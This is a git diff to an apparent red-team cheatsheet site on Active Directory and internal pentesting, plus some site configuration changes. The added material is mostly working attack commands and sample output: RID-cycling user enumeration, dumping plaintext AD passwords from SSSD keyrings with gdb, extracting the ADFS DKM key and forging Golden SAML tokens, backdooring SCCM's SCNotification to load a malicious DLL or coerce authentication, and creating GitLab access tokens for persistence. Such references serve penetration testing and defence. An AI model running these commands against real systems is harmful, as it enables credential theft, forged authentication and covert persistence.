diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 02091ac..ce85c4d 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -303,6 +303,27 @@ You can remotely query every machines on the network to get a list of the users' ``` +## RID cycling + +Enumerate users from the Domain Controllers. + +* Using `netexec` + ```ps1 + netexec smb 10.10.11.231 -u guest -p '' --rid-brute + SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) + SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest: + SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup) + SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser) + SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser) + SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser) + ``` + +* Using Impacket script [lookupsid.py](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) + ```ps1 + lookupsid.py -no-pass 'guest@rebound.htb' 20000 + ``` + + ## Other Interesting Commands - **Find Domain Controllers** diff --git a/docs/active-directory/ad-adds-linux.md b/docs/active-directory/ad-adds-linux.md index 9dae044..20b2d3b 100644 --- a/docs/active-directory/ad-adds-linux.md +++ b/docs/active-directory/ad-adds-linux.md @@ -40,7 +40,7 @@ make CONF=Release ## CCACHE ticket reuse from SSSD KCM -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. +System Security Services Daemon (SSSD) maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions. @@ -130,7 +130,53 @@ De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_ ``` +## Extract accounts from SSSD keyring + +**Requirements**: + +* `krb5_store_password_if_offline = True` in `/etc/sssd/sssd.conf` + +**Exploit**: + +When `krb5_store_password_if_offline` is enabled, the AD password is stored plaintext. + +```ps1 +[domain/domain.local] +cache_credentials = True +ipa_domain = domain.local +id_provider = ipa +auth_provider = ipa +access_provider = ipa +chpass_provider = ipa +ipa_server = _srv_, server.domain.local +krb5_store_password_if_offline = true +``` + + +Grab the PID of the SSSD process and hook it in `gdb`. Then list the process keyrings. + +```ps1 +gdb -p +call system("keyctl show > /tmp/output") +``` + +From the `/tmp/output` locate the `key_id` for the user you want. + +```ps1 +Session Keyring + 237034099 --alswrv 0 0 keyring: _ses + 689325199 --alswrv 0 0 \_ user: user@domain.local +``` + +Back to GDB: + +```ps1 +call system("keyctl print 689325199 > /tmp/output") +``` + + ## References * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) -* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) \ No newline at end of file +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [20.4. Caching Kerberos Passwords - Red Hat Customer Portal](https://access.redhat.com/documentation/fr-fr/red_hat_enterprise_linux/6/html/identity_management_guide/kerberos-pwd-cache) \ No newline at end of file diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md index 2666a3a..1f7b178 100644 --- a/docs/active-directory/ad-adfs-federation-services.md +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -1,7 +1,37 @@ # Active Directory - Federation Services +Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network. + + +## ADFS - DKM Master Key + +* The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object. + +```ps1 +$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto +[System.BitConverter]::ToString($key) +``` + + +## ADFS - Trust Relationship + +Gets the relying party trusts of the Federation Service. + +* Search for `IssuanceAuthorizationRules` + ```ps1 + Get-AdfsRelyingPartyTrust + ``` + + ## ADFS - Golden SAML +Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system. + +* Golden SAML are effective even when 2FA is enabled. +* The token-signing private key is not renewed automatically +* Changing a user’s password won't affect the generated SAML + + **Requirements**: * ADFS service account @@ -9,7 +39,7 @@ **Exploitation**: -* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` * Convert PFX and Private Key to binary format ```ps1 # For the pfx @@ -17,6 +47,7 @@ # For the private key echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin ``` + * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). ```ps1 mkdir ADFSpoofTools @@ -36,11 +67,64 @@ /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` + +**Manual Exploitation**: + +* Retrieve the WID path: `Get-AdfsProperties` +* Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust` +* Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin` + ```powershell + $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings" + $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString); + $client.Open(); + $cmd = $client.CreateCommand() + $cmd.CommandText = "SELECT name FROM sys.databases" + $reader = $cmd.ExecuteReader() + $reader.Read() | Out-Null + $name = $reader.GetString(0) + $reader.Close() + Write-Output $name; + ``` +* Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory: + ```ps1 + ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto + ``` +* Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key` +* Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML + +NOTE: There might be multiple master keys in the container, remember to try them all. + + +**Golden SAML Examples** + +* SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions` + ```ps1 + python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + +* Office365: requires `--upn` and `--objectguid` + ```ps1 + python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1 + ``` + +* Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format. + +**NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server. + + Other interesting tools to exploit AD FS: * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. - +* [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack + ```ps1 + python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED + ``` ## References -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) +* [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html) +* [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs) +* [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +* [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/) \ No newline at end of file diff --git a/docs/active-directory/deployment-sccm.md b/docs/active-directory/deployment-sccm.md index 2b00a8c..9b0abf7 100644 --- a/docs/active-directory/deployment-sccm.md +++ b/docs/active-directory/deployment-sccm.md @@ -1,12 +1,11 @@ # Deployment - SCCM -## Application Deployment +## SCCM Application Deployment > SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. -* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) -* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) - +* [PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) * Using **SharpSCCM** ```ps1 @@ -75,7 +74,10 @@ ``` -## Configuration Manager +## SCCM Configuration Manager + +* [subat0mik/Misconfiguration-Manager/MisconfigurationManager.ps1](https://raw.githubusercontent.com/subat0mik/Misconfiguration-Manager/main/MisconfigurationManager.ps1) + ### CRED-1 Retrieve credentials via PXE boot media @@ -214,6 +216,25 @@ From a remote machine. ``` +## SCCM Persistence + +* [mandiant/CcmPwn](https://github.com/mandiant/CcmPwn) - lateral movement script that leverages the CcmExec service to remotely hijack user sessions. + +CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine. + +* Backdoor the `SCNotification.exe.config` to load your DLL + + ```ps1 + python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config + ``` + +* Malicious config to force `SCNotification.exe` to load a file from an attacker-controlled file share + + ```ps1 + python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10 + ``` + + ## References * [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) @@ -222,4 +243,9 @@ From a remote machine. * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) -* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d) \ No newline at end of file +* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d) +* [SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau](https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en) +* [SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x0/) +* [SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x1/) +* [SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x2/) +* [SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024](https://mayfly277.github.io/posts/SCCM-LAB-part0x3/) \ No newline at end of file diff --git a/docs/cheatsheets/escape-breakout.md b/docs/cheatsheets/escape-breakout.md index 269801a..0dd3651 100644 --- a/docs/cheatsheets/escape-breakout.md +++ b/docs/cheatsheets/escape-breakout.md @@ -1,7 +1,8 @@ -# Application Escape and Breakout +# Kiosk Escape and Jail Breakout ## Summary +* [Methodology](#methodology) * [Gaining a command shell](#gaining-a-command-shell) * [Sticky Keys](#sticky-keys) * [Dialog Boxes](#dialog-boxes) @@ -21,6 +22,19 @@ * [kiosk.vsim.xyz](https://kiosk.vsim.xyz/) - tooling for browser-based, Kiosk mode testing. +## Methodology + +- Display global variables and their permissions: `export -p` +- Switch to another user using `sudo`/`su` +- Basic privilege escalations such as CVE, sudo misconfiguration, etc. Comprehensive list at [Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) / [Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/) +- List default commands in the restricted shell: `compgen -c` +- Container escape if it's running inside a `Docker`/`LXC` container +- Pivot onto the network + - Scan other machines on the network or attempt SSRF exploitation + - Metadata for Cloud assets, see `cloud/aws` and `cloud/azure` +- Use globbing capability built inside the shell: `echo *`, `echo .*`, `echo /*` + + ## Gaining a command shell * **Shortcut** @@ -106,6 +120,7 @@ Enter *.* or *.exe or similar in `File name` box * Print menus * All other menus that provide dialog boxes + ### Accessing filesystem Enter these paths in the address bar: @@ -115,6 +130,7 @@ Enter these paths in the address bar: * %HOMEDRIVE% * \\127.0.0.1\c$\Windows\System32 + ### Unassociated Protocols It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. @@ -143,6 +159,14 @@ firefox irc://127.0.0.1 -P "Test" ## Shell URI Handlers +A URI (Uniform Resource Identifier) handler is a software component that enables a web browser or operating system to pass a URI to an appropriate application for further handling. + +For example, when you click on a "mailto:" link in a webpage, your device knows to open your default email application. This is because the "mailto:" URI scheme is registered to be handled by an email application. Similarly, "http:" and "https:" URIs are typically handled by a web browser. + +In essence, URI handlers provide a bridge between web content and desktop applications, allowing for a seamless user experience when navigating between different types of resources. + +The following URI handlers might trigger application on the machine: + * shell:DocumentsLibrary * shell:Librariesshell:UserProfiles * shell:Personal diff --git a/docs/cheatsheets/source-code-management-ci.md b/docs/cheatsheets/source-code-management-ci.md index 6a450b0..c6ceaec 100644 --- a/docs/cheatsheets/source-code-management-ci.md +++ b/docs/cheatsheets/source-code-management-ci.md @@ -1,14 +1,6 @@ # Source Code Management & CI/CD Compromise -> - -## Summary - -* [Tools](#tools) -* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets) -* [Personal Access Token](#personal-access-token) -* [Gitlab CI/Github Actions](#gitlab-cigithub-actions) -* [References](#references) +> CI/CD is a method to frequently deliver apps to customers by introducing automation into the stages of app development. The main concepts attributed to CI/CD are continuous integration, continuous delivery, and continuous deployment. Compromises in CI/CD can occur through unauthorized access, misconfiguration, dependency vulnerabilities, insecure secrets, and lack of visibility. ## Tools @@ -51,17 +43,24 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local ``` -* Get the assigned privileges to an access token being used in a particular SCM system - ```ps1 - SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local - ``` * Promote a normal user to an administrative role in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName ``` -* Create/List/Delete an access token to be used in a particular SCM system + + +## Personal Access Token + +Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. + +* Manual + ```ps1 + curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" + ``` + +* Using `SCMKit.exe`: Create/List/Delete an access token to be used in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName @@ -69,6 +68,14 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser ``` +* Get the assigned privileges to an access token being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local + ``` + + +## SSH Keys + * Create/List an SSH key to be used in a particular SCM system ```ps1 SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" @@ -79,15 +86,8 @@ Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforce SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID ``` -## Personal Access Token -Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. - -```ps1 -curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" -``` - -## Gitlab CI/Github Actions +## Gitlab CI * Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` ```yaml @@ -107,6 +107,22 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers tags: - ${RUNNER} ``` + + +### Gitlab Executors + +* **Shell** executor: The jobs are run with the permissions of the GitLab Runner’s user and can steal code from other projects that are run on this server. +* **Docker** executor: Docker can be considered safe when running in non-privileged mode. +* **SSH** executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing `StrictHostKeyChecking` option. + + +### Gitlab CI/CD variables + +CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers + + +## Github Actions + * Github Action "Command Execution" example: `.github/workflows/example.yml` ```yml name: example @@ -127,7 +143,10 @@ curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-pers whoami ``` + ## References * [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) -* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) \ No newline at end of file +* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, Théo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) +* [Security for self-managed runners - Gitlab](https://docs.gitlab.com/runner/security/) +* [Fixing Typos and Breaching Microsoft’s Perimeter - John Stawinski IV - April 15, 2024](https://johnstawinski.com/2024/04/15/fixing-typos-and-breaching-microsofts-perimeter/) \ No newline at end of file diff --git a/docs/redteam/access/windows-using-credentials.md b/docs/redteam/access/windows-using-credentials.md index 2e40385..2e73887 100644 --- a/docs/redteam/access/windows-using-credentials.md +++ b/docs/redteam/access/windows-using-credentials.md @@ -344,12 +344,18 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## SSH Protocol -:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!) +:warning: You cannot pass the hash to SSH -```ps1 -cp user.ccache /tmp/krb5cc_1045 -ssh -o GSSAPIAuthentication=yes user@domain.local -vv -``` +* Connect using username/password of a Domain User + ```ps1 + ssh -l user@domain 192.168.1.1 + ``` + +* Connect with a Kerberos ticket + ```ps1 + cp user.ccache /tmp/krb5cc_1045 + ssh -o GSSAPIAuthentication=yes user@domain.local -vv + ``` ## Other methods diff --git a/mkdocs.yml b/mkdocs.yml index 61d4235..b1cf22b 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -2,8 +2,13 @@ site_name: Internal All The Things site_description: 'Active Directory and Internal Pentest Cheatsheets' site_url: https://swisskyrepo.github.io/InternalAllTheThings +repo_url: https://github.com/swisskyrepo/InternalAllTheThings +edit_uri: blob/main/docs/ + theme: name: material + color_mode: auto + user_color_mode_toggle: true icon: repo: fontawesome/brands/github palette: @@ -23,8 +28,13 @@ theme: features: - content.code.copy + - content.action.edit + - content.action.view + - content.tooltips - navigation.tracking - navigation.top + - search.share + - search.suggest extra_css: - custom.css @@ -46,8 +56,6 @@ markdown_extensions: emoji_index: !!python/name:material.extensions.emoji.twemoji emoji_generator: !!python/name:material.extensions.emoji.to_svg -repo_url: https://github.com/swisskyrepo/InternalAllTheThings/ -edit_uri: edit/master/ plugins: - search - git-revision-date-localized